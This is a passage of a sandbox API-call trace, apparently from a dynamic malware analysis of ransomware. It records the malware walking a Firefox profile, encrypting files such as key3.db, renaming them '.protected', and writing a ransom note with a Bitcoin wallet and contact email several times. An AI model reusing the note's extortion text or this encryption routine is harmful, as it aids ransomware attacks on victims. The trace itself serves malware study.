HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x295dba0 | out: 
lpFindFileData=0x295dba0) returned 0x47bbd0 [0090.634] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.634] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.634] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.634] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.634] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.634] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\.") returned 146 [0090.634] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.634] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0090.634] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.634] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.634] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.634] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.634] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.634] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\..") returned 147 [0090.634] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.634] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.634] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0090.634] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0090.634] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\RESTORE_FILES.txt") returned 162 [0090.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0090.635] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.635] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0090.636] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.636] WriteFile (in: hFile=0x160, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0090.636] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.636] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0090.636] CloseHandle (hObject=0x160) returned 1 [0090.636] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Windows") returned -1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Program Files") returned -1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Program Files (x86)") returned -1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="$Recycle.bin") returned 1 [0090.637] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="System Volume Information") returned -1 [0090.637] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 151 [0090.637] StrStrIW (lpFirst="818200132aebmoouht.sqlite", lpSrch=".protected") returned 0x0 [0090.637] lstrcmpW (lpString1="818200132aebmoouht.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.637] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0090.637] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0090.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0090.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 151 [0090.638] StrStrW (lpFirst="818200132aebmoouht.sqlite", lpSrch=".txt") returned 0x0 [0090.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 151 [0090.638] StrStrW (lpFirst="818200132aebmoouht.sqlite", lpSrch=".rar") returned 0x0 [0090.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 151 [0090.638] StrStrW (lpFirst="818200132aebmoouht.sqlite", lpSrch=".zip") returned 0x0 [0090.638] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0090.650] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.650] WriteFile (in: 
hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0090.651] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.651] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0090.652] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0090.652] CloseHandle (hObject=0x160) returned 1 [0090.652] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.protected") returned 161 [0090.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.protected")) returned 1 [0090.653] FindNextFileW (in: hFindFile=0x47bb90, 
lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0090.653] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0090.653] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\RESTORE_FILES.txt") returned 143 [0090.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.654] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.654] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0090.655] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.655] WriteFile (in: hFile=0x15c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.655] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.655] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0090.655] CloseHandle (hObject=0x15c) returned 1 [0090.655] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0090.655] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0090.655] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\RESTORE_FILES.txt") returned 139 [0090.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.666] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.666] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0090.668] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.668] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 
[0090.668] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.668] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0090.668] CloseHandle (hObject=0x158) returned 1 [0090.669] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.669] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.669] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\RESTORE_FILES.txt") returned 119 [0090.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.670] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.670] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.671] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.671] WriteFile (in: hFile=0x154, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.671] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.671] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.671] CloseHandle (hObject=0x154) returned 1 [0090.672] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="Windows") returned -1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="Program Files") returned -1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="Program Files (x86)") returned -1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="$Recycle.bin") returned 1 [0090.672] lstrcmpiW (lpString1="key3.db", lpString2="System Volume Information") returned -1 [0090.672] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned 99 [0090.672] StrStrIW (lpFirst="key3.db", lpSrch=".protected") returned 0x0 [0090.672] lstrcmpW (lpString1="key3.db", lpString2="RESTORE_FILES.txt") returned -1 [0090.672] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.672] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.672] CreateFileW 
